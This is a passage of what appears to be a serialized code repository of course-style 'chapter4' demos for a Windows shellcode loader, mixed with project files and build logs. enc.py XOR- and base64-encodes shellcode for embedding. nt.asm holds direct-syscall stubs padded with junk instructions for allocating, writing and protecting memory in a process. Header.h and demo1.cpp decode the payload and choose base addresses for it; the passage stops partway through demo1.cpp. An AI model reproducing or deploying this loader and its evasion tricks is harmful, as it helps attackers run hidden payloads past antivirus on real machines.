<ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <PropertyGroup Label=\"UserMacros\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <LinkIncremental>true</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <LinkIncremental>true</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <LinkIncremental>false</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <LinkIncremental>false</LinkIncremental>\r\n  </PropertyGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <ClCompile>\r\n      <PrecompiledHeader>\r\n      </PrecompiledHeader>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <Optimization>Disabled</Optimization>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <ClCompile>\r\n      <PrecompiledHeader>\r\n      </PrecompiledHeader>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <Optimization>Disabled</Optimization>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      
<ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <ClCompile>\r\n      <PrecompiledHeader>\r\n      </PrecompiledHeader>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <Optimization>MaxSpeed</Optimization>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <ClCompile>\r\n      <PrecompiledHeader>\r\n      </PrecompiledHeader>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <Optimization>Disabled</Optimization>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"base64.cpp\" 
/>\r\n    <ClCompile Include=\"demo1.cpp\" />\r\n    <MASM Include=\"nt.asm\">\r\n      <FileType>CppCode</FileType>\r\n    </MASM>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClInclude Include=\"base64.h\" />\r\n    <ClInclude Include=\"Header.h\" />\r\n    <ClInclude Include=\"nt.h\" />\r\n  </ItemGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\r\n  <ImportGroup Label=\"ExtensionTargets\">\r\n    <Import Project=\"$(VCTargetsPath)\\BuildCustomizations\\masm.targets\" />\r\n  </ImportGroup>\r\n</Project>"
  },
  {
    "path": "chapter4-demo2/demo1/demo1.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup>\r\n    <Filter Include=\"Source Files\">\r\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\r\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"Resource Files\">\r\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\r\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"Resource Files\\Header Files\">\r\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\r\n      <Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>\r\n    </Filter>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"demo1.cpp\">\r\n      <Filter>Source Files</Filter>\r\n    </ClCompile>\r\n    <ClCompile Include=\"base64.cpp\">\r\n      <Filter>Source Files</Filter>\r\n    </ClCompile>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClInclude Include=\"Header.h\">\r\n      <Filter>Resource Files</Filter>\r\n    </ClInclude>\r\n    <ClInclude Include=\"base64.h\">\r\n      <Filter>Resource Files\\Header Files</Filter>\r\n    </ClInclude>\r\n    <ClInclude Include=\"nt.h\">\r\n      <Filter>Resource Files\\Header Files</Filter>\r\n    </ClInclude>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <MASM Include=\"nt.asm\">\r\n      <Filter>Source Files</Filter>\r\n    </MASM>\r\n  </ItemGroup>\r\n</Project>"
  },
  {
    "path": "chapter4-demo2/demo1/demo1.vcxproj.user",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <PropertyGroup />\r\n</Project>"
  },
  {
    "path": "chapter4-demo2/demo1/nt.asm",
    "content": ".code\r\n\r\n\r\nbye :\r\nret\r\n\r\nBNtAVM proc\r\nmov r8, r10\r\nmov r10, 01h\r\nxor r10, r10\r\nmov r10, 0Ah\r\nmov r10, rcx\r\nxor eax, eax\r\nsub r8, r10\r\nadd eax, 18h; 1507 +\r\nxor r8, r8\r\nsyscall\r\nret\r\nBNtAVM endp\r\n\r\n\r\nBNtWVM proc\r\nadd rcx, 0Ah\r\nxor eax, eax\r\nmov r10, rcx\r\nadd eax, 3Ah; 1507 +\r\nsub r10, 0Ah\r\nsub rcx, 0Ah\r\nsyscall\r\nret\r\nBNtWVM endp\r\n\r\n\r\nBNtPVM proc\r\nadd r10, 1Ch\r\nxor eax, eax\r\nmov r10, rcx\r\nsub r10, 01h\r\nadd eax, 50h; 1507 +\r\nadd r10, 01h\r\nsyscall\r\nret\r\nBNtPVM endp\r\n\r\n\r\nend"
  },
  {
    "path": "chapter4-demo2/demo1/nt.h",
    "content": "#pragma once\r\n#include <Windows.h>\r\n\r\n#define STATUS_SUCCESS 0\r\n\r\nEXTERN_C NTSTATUS BNtAVM(\r\n\tHANDLE ProcessHandle,\r\n\tPVOID* BaseAddress,\r\n\tULONG_PTR ZeroBits,\r\n\tPSIZE_T RegionSize,\r\n\tULONG AllocationType,\r\n\tULONG Protect\r\n);\r\n\r\nEXTERN_C NTSTATUS BNtWVM(\r\n\tHANDLE hProcess,\r\n\tPVOID lpBaseAddress,\r\n\tPVOID lpBuffer,\r\n\tSIZE_T NumberOfBytesToRead,\r\n\tPSIZE_T NumberOfBytesRead\r\n);\r\n\r\nEXTERN_C NTSTATUS BNtPVM(\r\n\tHANDLE ProcessHandle,\r\n\tPVOID* BaseAddress,\r\n\tSIZE_T* NumberOfBytesToProtect,\r\n\tULONG NewAccessProtection,\r\n\tPULONG OldAccessProtection\r\n);\r\n"
  },
  {
    "path": "chapter4-demo2/demo1/x64/Debug/demo1.exe.recipe",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n  <ProjectOutputs>\r\n    <ProjectOutput>\r\n      <FullPath>E:\\last\\demo1\\x64\\Debug\\demo1.exe</FullPath>\r\n    </ProjectOutput>\r\n  </ProjectOutputs>\r\n  <ContentFiles />\r\n  <SatelliteDlls />\r\n  <NonRecipeFileRefs />\r\n</Project>"
  },
  {
    "path": "chapter4-demo2/demo1/x64/Debug/demo1.log",
    "content": "﻿  demo1.vcxproj -> E:\\last\\demo1\\x64\\Debug\\demo1.exe\r\n"
  },
  {
    "path": "chapter4-demo2/demo1/x64/Debug/demo1.tlog/demo1.lastbuildstate",
    "content": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nDebug|x64|E:\\last\\demo1\\|\r\n"
  },
  {
    "path": "chapter4-demo2/demo1/x64/Release/demo1.exe.recipe",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n  <ProjectOutputs>\r\n    <ProjectOutput>\r\n      <FullPath>E:\\last\\demo1\\x64\\Release\\demo1.exe</FullPath>\r\n    </ProjectOutput>\r\n  </ProjectOutputs>\r\n  <ContentFiles />\r\n  <SatelliteDlls />\r\n  <NonRecipeFileRefs />\r\n</Project>"
  },
  {
    "path": "chapter4-demo2/demo1/x64/Release/demo1.log",
    "content": "﻿  demo1.cpp\r\nE:\\last\\demo1\\demo1\\header.h(6,67): warning C4312: “类型强制转换”: 从“unsigned int”转换到更大的“void *”\r\nE:\\last\\demo1\\demo1\\demo1.cpp(29,10): warning C4244: “=”: 从“SIZE_T”转换到“DWORD”，可能丢失数据\r\nE:\\last\\demo1\\demo1\\demo1.cpp(34,28): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”，可能丢失数据\r\nE:\\last\\demo1\\demo1\\demo1.cpp(39,16): warning C4018: “<”: 有符号/无符号不匹配\r\nE:\\last\\demo1\\demo1\\demo1.cpp(139,58): warning C4267: “初始化”: 从“size_t”转换到“DWORD”，可能丢失数据\r\nE:\\last\\demo1\\demo1\\demo1.cpp(140,16): warning C4244: “初始化”: 从“SIZE_T”转换到“DWORD”，可能丢失数据\r\nE:\\last\\demo1\\demo1\\demo1.cpp(145,3): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”，可能丢失数据\r\nE:\\last\\demo1\\demo1\\demo1.cpp(144,3): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”，可能丢失数据\r\nE:\\last\\demo1\\demo1\\demo1.cpp(153,20): warning C4018: “<=”: 有符号/无符号不匹配\r\nE:\\last\\demo1\\demo1\\demo1.cpp(180,20): warning C4018: “<”: 有符号/无符号不匹配\r\nE:\\last\\demo1\\demo1\\demo1.cpp(179,12): warning C4101: “cmm_i”: 未引用的局部变量\r\nE:\\last\\demo1\\demo1\\demo1.cpp(175,18): warning C4101: “oldProt”: 未引用的局部变量\r\n  正在生成代码\r\n  已完成代码的生成\r\n  1 of 225 functions ( 0.4%) were compiled, the rest were copied from previous compilation.\r\n    0 functions were new in current compilation\r\n    0 functions had inline decision re-evaluated but remain unchanged\r\n  demo1.vcxproj -> E:\\last\\demo1\\x64\\Release\\demo1.exe\r\n"
  },
  {
    "path": "chapter4-demo2/demo1/x64/Release/demo1.tlog/demo1.lastbuildstate",
    "content": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nRelease|x64|E:\\last\\demo1\\|\r\n"
  },
  {
    "path": "chapter4-demo2/demo1.sln",
    "content": "﻿\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.28729.10\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"demo1\", \"demo1\\demo1.vcxproj\", \"{1876F365-2DEC-42C9-B80E-B631B26FCAD8}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|x64 = Debug|x64\r\n\t\tDebug|x86 = Debug|x86\r\n\t\tRelease|x64 = Release|x64\r\n\t\tRelease|x86 = Release|x86\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x64.Build.0 = Debug|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x86.Build.0 = Debug|Win32\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x64.Build.0 = Release|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x86.ActiveCfg = Release|Win32\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x86.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {1F8E67EA-F3B7-42DD-84B6-2CD2AC0305B7}\r\n\tEndGlobalSection\r\nEndGlobal\r\n"
  },
  {
    "path": "chapter4-demo2/enc.py",
    "content": "import base64\r\n\r\n# Encoder side of the loader's obfuscation: XOR every raw shellcode byte with\r\n# the single-byte key (8, which must match XOR_KEY in Header.h), then\r\n# base64-encode the result. The loader reverses this in the opposite order:\r\n# base64-decode first, then XOR each byte with the same key.\r\nXOR_KEY = 8\r\n\r\nwith open(\"1.txt\", \"rb\") as f:\r\n    raw = f.read()\r\n    encoded = bytearray(b ^ XOR_KEY for b in raw)\r\n    # Print as plain text rather than a b'...' repr so it can be pasted into the C++ source\r\n    print(base64.b64encode(encoded).decode(\"ascii\"))"
  },
  {
    "path": "chapter4-demo3/demo1/Debug/demo1.log",
    "content": "﻿  demo1.vcxproj -> E:\\7bits_demo\\demo1\\demo1\\Debug\\demo1.exe\r\n"
  },
  {
    "path": "chapter4-demo3/demo1/Debug/demo1.tlog/demo1.lastbuildstate",
    "content": "#TargetFrameworkVersion=v4.0:PlatformToolSet=v142:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0\r\nDebug|Win32|E:\\7bits_demo\\demo1\\demo1\\|\r\n"
  },
  {
    "path": "chapter4-demo3/demo1/Header.h",
    "content": "#pragma once\r\n\r\n#include <windows.h>\r\n#include <vector>\r\n\r\n// Single-byte XOR key; must match the key used by enc.py (i ^ 8).\r\nconst int XOR_KEY{ 8 };\r\n\r\n// Candidate base addresses tried in order by GetSuitableBaseAddress().\r\n// Cast through ULONG_PTR so the literal is widened to pointer size before\r\n// the pointer cast (avoids warning C4312 on x64 builds).\r\nconst std::vector<LPVOID> VC_PREF_BASES{ (LPVOID)(ULONG_PTR)0x00000000DDDD0000,\r\n                                       (LPVOID)(ULONG_PTR)0x0000000010000000,\r\n                                       (LPVOID)(ULONG_PTR)0x0000000021000000,\r\n                                       (LPVOID)(ULONG_PTR)0x0000000032000000,\r\n                                       (LPVOID)(ULONG_PTR)0x0000000043000000,\r\n                                       (LPVOID)(ULONG_PTR)0x0000000050000000,\r\n                                       (LPVOID)(ULONG_PTR)0x0000000041000000,\r\n                                       (LPVOID)(ULONG_PTR)0x0000000042000000,\r\n                                       (LPVOID)(ULONG_PTR)0x0000000040000000,\r\n                                       (LPVOID)(ULONG_PTR)0x0000000022000000 };"
  },
  {
    "path": "chapter4-demo3/demo1/base64.cpp",
    "content": "/*\n   base64.cpp and base64.h\n\n   base64 encoding and decoding with C++.\n   More information at\n\t https://renenyffenegger.ch/notes/development/Base64/Encoding-and-decoding-base-64-with-cpp\n\n   Version: 2.rc.08 (release candidate)\n\n   Copyright (C) 2004-2017, 2020, 2021 René Nyffenegger\n\n   This source code is provided 'as-is', without any express or implied\n   warranty. In no event will the author be held liable for any damages\n   arising from the use of this software.\n\n   Permission is granted to anyone to use this software for any purpose,\n   including commercial applications, and to alter it and redistribute it\n   freely, subject to the following restrictions:\n\n   1. The origin of this source code must not be misrepresented; you must not\n\t  claim that you wrote the original source code. If you use this source code\n\t  in a product, an acknowledgment in the product documentation would be\n\t  appreciated but is not required.\n\n   2. Altered source versions must be plainly marked as such, and must not be\n\t  misrepresented as being the original source code.\n\n   3. 
This notice may not be removed or altered from any source distribution.\n\n   René Nyffenegger rene.nyffenegger@adp-gmbh.ch\n\n*/\n\n#include \"base64.h\"\n\n#include <algorithm>\n#include <stdexcept>\n\n//\n// Depending on the url parameter in base64_chars, one of\n// two sets of base64 characters needs to be chosen.\n// They differ in their last two characters.\n//\nstatic const char* base64_chars[2] = {\n\t\t\t \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\t\t\t \"abcdefghijklmnopqrstuvwxyz\"\n\t\t\t \"0123456789\"\n\t\t\t \"+/\",\n\n\t\t\t \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\t\t\t \"abcdefghijklmnopqrstuvwxyz\"\n\t\t\t \"0123456789\"\n\t\t\t \"-_\" };\n\nstatic unsigned int pos_of_char(const unsigned char chr) {\n\t//\n\t// Return the position of chr within base64_encode()\n\t//\n\n\tif (chr >= 'A' && chr <= 'Z') return chr - 'A';\n\telse if (chr >= 'a' && chr <= 'z') return chr - 'a' + ('Z' - 'A') + 1;\n\telse if (chr >= '0' && chr <= '9') return chr - '0' + ('Z' - 'A') + ('z' - 'a') + 2;\n\telse if (chr == '+' || chr == '-') return 62; // Be liberal with input and accept both url ('-') and non-url ('+') base 64 characters (\n\telse if (chr == '/' || chr == '_') return 63; // Ditto for '/' and '_'\n\telse\n\t\t//\n\t\t// 2020-10-23: Throw std::exception rather than const char*\n\t\t//(Pablo Martin-Gomez, https://github.com/Bouska)\n\t\t//\n\t\tthrow std::runtime_error(\"Input is not valid base64-encoded data.\");\n}\n\nstatic std::string insert_linebreaks(std::string str, size_t distance) {\n\t//\n\t// Provided by https://github.com/JomaCorpFX, adapted by me.\n\t//\n\tif (!str.length()) {\n\t\treturn \"\";\n\t}\n\n\tsize_t pos = distance;\n\n\twhile (pos < str.size()) {\n\t\tstr.insert(pos, \"\\n\");\n\t\tpos += distance + 1;\n\t}\n\n\treturn str;\n}\n\ntemplate <typename String, unsigned int line_length>\nstatic std::string encode_with_line_breaks(String s) {\n\treturn insert_linebreaks(base64_encode(s, false), line_length);\n}\n\ntemplate <typename String>\nstatic 
std::string encode_pem(String s) {\n\treturn encode_with_line_breaks<String, 64>(s);\n}\n\ntemplate <typename String>\nstatic std::string encode_mime(String s) {\n\treturn encode_with_line_breaks<String, 76>(s);\n}\n\ntemplate <typename String>\nstatic std::string encode(String s, bool url) {\n\treturn base64_encode(reinterpret_cast<const unsigned char*>(s.data()), s.length(), url);\n}\n\nstd::string base64_encode(unsigned char const* bytes_to_encode, size_t in_len, bool url) {\n\n\tsize_t len_encoded = (in_len + 2) / 3 * 4;\n\n\tunsigned char trailing_char = url ? '.' : '=';\n\n\t//\n\t// Choose set of base64 characters. They differ\n\t// for the last two positions, depending on the url\n\t// parameter.\n\t// A bool (as is the parameter url) is guaranteed\n\t// to evaluate to either 0 or 1 in C++ therefore,\n\t// the correct character set is chosen by subscripting\n\t// base64_chars with url.\n\t//\n\tconst char* base64_chars_ = base64_chars[url];\n\n\tstd::string ret;\n\tret.reserve(len_encoded);\n\n\tunsigned int pos = 0;\n\n\twhile (pos < in_len) {\n\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0xfc) >> 2]);\n\n\t\tif (pos + 1 < in_len) {\n\t\t\tret.push_back(base64_chars_[((bytes_to_encode[pos + 0] & 0x03) << 4) + ((bytes_to_encode[pos + 1] & 0xf0) >> 4)]);\n\n\t\t\tif (pos + 2 < in_len) {\n\t\t\t\tret.push_back(base64_chars_[((bytes_to_encode[pos + 1] & 0x0f) << 2) + ((bytes_to_encode[pos + 2] & 0xc0) >> 6)]);\n\t\t\t\tret.push_back(base64_chars_[bytes_to_encode[pos + 2] & 0x3f]);\n\t\t\t}\n\t\t\telse {\n\t\t\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 1] & 0x0f) << 2]);\n\t\t\t\tret.push_back(trailing_char);\n\t\t\t}\n\t\t}\n\t\telse {\n\n\t\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0x03) << 4]);\n\t\t\tret.push_back(trailing_char);\n\t\t\tret.push_back(trailing_char);\n\t\t}\n\n\t\tpos += 3;\n\t}\n\n\n\treturn ret;\n}\n\ntemplate <typename String>\nstatic std::string decode(String encoded_string, bool 
remove_linebreaks) {\n\t//\n\t// decode(…) is templated so that it can be used with String = const std::string&\n\t// or std::string_view (requires at least C++17)\n\t//\n\n\tif (encoded_string.empty()) return std::string();\n\n\tif (remove_linebreaks) {\n\n\t\tstd::string copy(encoded_string);\n\n\t\tcopy.erase(std::remove(copy.begin(), copy.end(), '\\n'), copy.end());\n\n\t\treturn base64_decode(copy, false);\n\t}\n\n\tsize_t length_of_string = encoded_string.length();\n\tsize_t pos = 0;\n\n\t//\n\t// The approximate length (bytes) of the decoded string might be one or\n\t// two bytes smaller, depending on the amount of trailing equal signs\n\t// in the encoded string. This approximation is needed to reserve\n\t// enough space in the string to be returned.\n\t//\n\tsize_t approx_length_of_decoded_string = length_of_string / 4 * 3;\n\tstd::string ret;\n\tret.reserve(approx_length_of_decoded_string);\n\n\twhile (pos < length_of_string) {\n\t\t//\n\t\t// Iterate over encoded input string in chunks. The size of all\n\t\t// chunks except the last one is 4 bytes.\n\t\t//\n\t\t// The last chunk might be padded with equal signs or dots\n\t\t// in order to make it 4 bytes in size as well, but this\n\t\t// is not required as per RFC 2045.\n\t\t//\n\t\t// All chunks except the last one produce three output bytes.\n\t\t//\n\t\t// The last chunk produces at least one and up to three bytes.\n\t\t//\n\n\t\tsize_t pos_of_char_1 = pos_of_char(encoded_string[pos + 1]);\n\n\t\t//\n\t\t// Emit the first output byte that is produced in each chunk:\n\t\t//\n\t\tret.push_back(static_cast<std::string::value_type>(((pos_of_char(encoded_string[pos + 0])) << 2) + ((pos_of_char_1 & 0x30) >> 4)));\n\n\t\tif ((pos + 2 < length_of_string) &&  // Check for data that is not padded with equal signs (which is allowed by RFC 2045)\n\t\t\tencoded_string[pos + 2] != '=' &&\n\t\t\tencoded_string[pos + 2] != '.'            // accept URL-safe base 64 strings, too, so check for '.' 
also.\n\t\t\t)\n\t\t{\n\t\t\t//\n\t\t\t// Emit a chunk's second byte (which might not be produced in the last chunk).\n\t\t\t//\n\t\t\tunsigned int pos_of_char_2 = pos_of_char(encoded_string[pos + 2]);\n\t\t\tret.push_back(static_cast<std::string::value_type>(((pos_of_char_1 & 0x0f) << 4) + ((pos_of_char_2 & 0x3c) >> 2)));\n\n\t\t\tif ((pos + 3 < length_of_string) &&\n\t\t\t\tencoded_string[pos + 3] != '=' &&\n\t\t\t\tencoded_string[pos + 3] != '.'\n\t\t\t\t)\n\t\t\t{\n\t\t\t\t//\n\t\t\t\t// Emit a chunk's third byte (which might not be produced in the last chunk).\n\t\t\t\t//\n\t\t\t\tret.push_back(static_cast<std::string::value_type>(((pos_of_char_2 & 0x03) << 6) + pos_of_char(encoded_string[pos + 3])));\n\t\t\t}\n\t\t}\n\n\t\tpos += 4;\n\t}\n\n\treturn ret;\n}\n\nstd::string base64_decode(std::string const& s, bool remove_linebreaks) {\n\treturn decode(s, remove_linebreaks);\n}\n\nstd::string base64_encode(std::string const& s, bool url) {\n\treturn encode(s, url);\n}\n\nstd::string base64_encode_pem(std::string const& s) {\n\treturn encode_pem(s);\n}\n\nstd::string base64_encode_mime(std::string const& s) {\n\treturn encode_mime(s);\n}\n\n#if __cplusplus >= 201703L\n//\n// Interface with std::string_view rather than const std::string&\n// Requires C++17\n// Provided by Yannic Bonenberger (https://github.com/Yannic)\n//\n\nstd::string base64_encode(std::string_view s, bool url) {\n\treturn encode(s, url);\n}\n\nstd::string base64_encode_pem(std::string_view s) {\n\treturn encode_pem(s);\n}\n\nstd::string base64_encode_mime(std::string_view s) {\n\treturn encode_mime(s);\n}\n\nstd::string base64_decode(std::string_view s, bool remove_linebreaks) {\n\treturn decode(s, remove_linebreaks);\n}\n\n#endif  // __cplusplus >= 201703L\n"
  },
  {
    "path": "chapter4-demo3/demo1/base64.h",
    "content": "//\n//  base64 encoding and decoding with C++.\n//  Version: 2.rc.08 (release candidate)\n//\n\n#ifndef BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A\n#define BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A\n\n#include <string>\n\n#if __cplusplus >= 201703L\n#include <string_view>\n#endif  // __cplusplus >= 201703L\n\nstd::string base64_encode(std::string const& s, bool url = false);\nstd::string base64_encode_pem(std::string const& s);\nstd::string base64_encode_mime(std::string const& s);\n\nstd::string base64_decode(std::string const& s, bool remove_linebreaks = false);\nstd::string base64_encode(unsigned char const*, size_t len, bool url = false);\n\n#if __cplusplus >= 201703L\n//\n// Interface with std::string_view rather than const std::string&\n// Requires C++17\n// Provided by Yannic Bonenberger (https://github.com/Yannic)\n//\nstd::string base64_encode(std::string_view s, bool url = false);\nstd::string base64_encode_pem(std::string_view s);\nstd::string base64_encode_mime(std::string_view s);\n\nstd::string base64_decode(std::string_view s, bool remove_linebreaks = false);\n#endif  // __cplusplus >= 201703L\n\n#endif /* BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A */\n"
  },
  {
    "path": "chapter4-demo3/demo1/demo1.cpp",
    "content": "// demo1.cpp : This file contains the 'main' function. Program execution begins and ends there.\r\n//\r\n\r\n#include <iostream>\r\n#include <windows.h>\r\n#include \"header.h\"\r\n#include \"base64.h\"\r\n#include \"nt.h\"\r\nusing namespace std;\r\n\r\nunsigned char* ReadProcessBlob(const char* fnamSc, DWORD* szSc)\r\n{\r\n\tDWORD szRead{ 0 };\r\n\r\n\tHANDLE hFile = CreateFileA(\r\n\t\tfnamSc,\r\n\t\tGENERIC_READ,\r\n\t\tNULL,\r\n\t\tNULL,\r\n\t\tOPEN_EXISTING,\r\n\t\tFILE_ATTRIBUTE_NORMAL,\r\n\t\tNULL\r\n\t);\r\n\r\n\tif (INVALID_HANDLE_VALUE == hFile)\r\n\t\treturn nullptr;\r\n\r\n\tSIZE_T szFile = GetFileSize(hFile, NULL);\r\n\t*szSc = szFile;\r\n\r\n\tunsigned char* raw = new unsigned char[szFile];\r\n\tunsigned char* sc = new unsigned char[szFile];\r\n\r\n\tif (!ReadFile(hFile, raw, szFile, &szRead, NULL))\r\n\t\treturn nullptr;\r\n\r\n\tint i;\r\n\r\n\tfor (i = 0; i < szRead; i++) {\r\n\t\tsc[i] = raw[i] ^ XOR_KEY;\r\n\t}\r\n\r\n\treturn sc;\r\n}\r\n\r\n\r\nstd::string replace(const std::string& inStr, const char* pSrc, const char* pReplace)\r\n\r\n{\r\n\tstd::string str = inStr;\r\n\tstd::string::size_type stStart = 0;\r\n\tstd::string::iterator iter = str.begin();\r\n\twhile (iter != str.end())\r\n\r\n\t{\r\n\t\tstd::string::size_type st = str.find(pSrc, stStart);\r\n\r\n\t\tif (st == str.npos)\r\n\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\titer = iter + st - stStart;\r\n\t\tstr.replace(iter, iter + strlen(pSrc), pReplace);\r\n\t\titer = iter + strlen(pReplace);\r\n\t\tstStart = st + strlen(pReplace);\r\n\t}\r\n\r\n\treturn str;\r\n\r\n}\r\n\r\nLPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD szPage, DWORD szAllocGran, DWORD cVmResv)\r\n{\r\n\tMEMORY_BASIC_INFORMATION mbi;\r\n\r\n\tfor (auto base : VC_PREF_BASES) 